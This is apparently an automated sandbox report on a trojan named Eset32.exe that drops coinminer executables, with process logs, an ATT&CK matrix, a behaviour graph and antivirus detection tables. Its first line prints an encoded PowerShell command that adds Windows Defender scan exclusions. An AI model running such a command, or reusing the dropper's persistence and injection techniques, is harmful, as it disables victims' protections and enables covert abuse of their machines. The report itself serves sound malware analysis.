            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
            Source: C:\Users\user\AppData\Roaming\12.exeQueries volume information: C:\Users\user\AppData\Roaming\12.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows\System.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows\System.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exeQueries volume information: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\12.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\AppData\Roaming\1.exeCode function: 4_2_00409CDC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00409CDC
            Source: C:\Users\user\Desktop\Eset32.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts111
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		1
            Access Token Manipulation            		1
            Disable or Modify Tools            		OS Credential Dumping1
            System Time Discovery            		Remote Services11
            Archive Collected Data            		Exfiltration Over Other Network Medium1
            Ingress Tool Transfer            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            System Shutdown/Reboot
            Default Accounts1
            Native API            		Boot or Logon Initialization Scripts311
            Process Injection            		11
            Deobfuscate/Decode Files or Information            		LSASS Memory2
            File and Directory Discovery            		Remote Desktop Protocol1
            Clipboard Data            		Exfiltration Over Bluetooth1
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts1
            Command and Scripting Interpreter            		Logon Script (Windows)1
            Scheduled Task/Job            		21
            Obfuscated Files or Information            		Security Account Manager16
            System Information Discovery            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
            Non-Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local Accounts1
            Scheduled Task/Job            		Logon Script (Mac)Logon Script (Mac)21
            Software Packing            		NTDS1
            Query Registry            		Distributed Component Object ModelInput CaptureScheduled Transfer2
            Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud Accounts1
            PowerShell            		Network Logon ScriptNetwork Logon Script1
            Masquerading            		LSA Secrets211
            Security Software Discovery            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common131
            Virtualization/Sandbox Evasion            		Cached Domain Credentials1
            Process Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Access Token Manipulation            		DCSync131
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job311
            Process Injection            		Proc Filesystem1
            Application Window Discovery            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
            Remote System Discovery            		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
            System Network Configuration Discovery            		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 596584 Sample: Eset32.exe Startdate: 24/03/2022 Architecture: WINDOWS Score: 100 88 Antivirus / Scanner detection for submitted sample 2->88 90 Multi AV Scanner detection for submitted file 2->90 92 Yara detected Xmrig cryptocurrency miner 2->92 94 7 other signatures 2->94 10 Eset32.exe 9 2->10         started        13 System.exe 2->13         started        process3 file4 70 C:\Users\user\AppData\Roaming\12.exe, PE32+ 10->70 dropped 72 C:\Users\user\AppData\Roaming\1.exe, PE32 10->72 dropped 16 12.exe 5 10->16         started        20 1.exe 1 10->20         started        112 Multi AV Scanner detection for dropped file 13->112 114 Machine Learning detection for dropped file 13->114 22 cmd.exe 13->22         started        signatures5 process6 file7 66 C:\Users\user\AppData\Roaming\...\System.exe, PE32+ 16->66 dropped 76 Multi AV Scanner detection for dropped file 16->76 78 Machine Learning detection for dropped file 16->78 24 cmd.exe 16->24         started        26 cmd.exe 1 16->26         started        29 cmd.exe 16->29         started        80 Writes to foreign memory regions 20->80 82 Allocates memory in foreign processes 20->82 84 Injects a PE file into a foreign processes 20->84 31 AppLaunch.exe 15 3 20->31         started        34 conhost.exe 20->34         started        86 Encrypted powershell cmdline option found 22->86 36 conhost.exe 22->36         started        38 powershell.exe 22->38         started        signatures8 process9 dnsIp10 40 System.exe 24->40         started        43 conhost.exe 24->43         started        104 Encrypted powershell cmdline option found 26->104 106 Uses schtasks.exe or at.exe to add and modify task schedules 26->106 45 powershell.exe 22 26->45         started        47 powershell.exe 18 26->47         started        49 conhost.exe 26->49         started        51 conhost.exe 29->51         started        53 schtasks.exe 29->53         started        74 ip-api.com 208.95.112.1, 49773, 80 TUT-ASUS United States 31->74 108 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 31->108 110 May check the online IP address of the machine 31->110 signatures11 process12 file13 68 C:\Users\user\AppData\...\sihost64.exe, PE32+ 40->68 dropped 55 sihost64.exe 40->55         started        58 cmd.exe 40->58         started        process14 signatures15 96 Antivirus detection for dropped file 55->96 98 Multi AV Scanner detection for dropped file 55->98 100 Machine Learning detection for dropped file 55->100 102 Encrypted powershell cmdline option found 58->102 60 conhost.exe 58->60         started        62 powershell.exe 58->62         started        64 powershell.exe 58->64         started        process16

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Eset32.exe63%VirustotalBrowse
            Eset32.exe14%MetadefenderBrowse
            Eset32.exe60%ReversingLabsWin32.Trojan.Zenpak
            Eset32.exe100%AviraHEUR/AGEN.1210313
            Eset32.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe100%AviraHEUR/AGEN.1235806
            C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\1.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\12.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\Windows\System.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\1.exe37%VirustotalBrowse
            C:\Users\user\AppData\Roaming\1.exe45%ReversingLabsWin32.Trojan.Zenpak
            C:\Users\user\AppData\Roaming\12.exe60%VirustotalBrowse
            C:\Users\user\AppData\Roaming\12.exe60%ReversingLabsByteCode-MSIL.Trojan.CoinminerX
            C:\Users\user\AppData\Roaming\Windows\System.exe60%VirustotalBrowse
            C:\Users\user\AppData\Roaming\Windows\System.exe60%ReversingLabsByteCode-MSIL.Trojan.CoinminerX
            C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe30%VirustotalBrowse
            C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe73%ReversingLabsByteCode-MSIL.Trojan.Tedy

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            36.0.sihost64.exe.fe0000.0.unpack100%AviraHEUR/AGEN.1235806Download File
            6.2.AppLaunch.exe.400000.0.unpack100%AviraHEUR/AGEN.1203048Download File
            1.2.12.exe.370000.0.unpack100%AviraHEUR/AGEN.1221928Download File
            22.0.System.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1221928Download File
            0.0.Eset32.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
            26.2.System.exe.d10000.0.unpack100%AviraHEUR/AGEN.1221928Download File
            0.2.Eset32.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
            26.0.System.exe.d10000.0.unpack100%AviraHEUR/AGEN.1221928Download File
            1.0.12.exe.370000.0.unpack100%AviraHEUR/AGEN.1221928Download File
            36.2.sihost64.exe.fe0000.0.unpack100%AviraHEUR/AGEN.1235806Download File
            4.3.1.exe.2610000.0.unpack100%AviraHEUR/AGEN.1203048Download File
            22.2.System.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1221928Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://sectigo.com/CPS00%URL Reputationsafe
            http://ocsp.sectigo.com00%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://ocsp.entrust.net030%URL Reputationsafe
            http://ocsp.entrust.net020%URL Reputationsafe
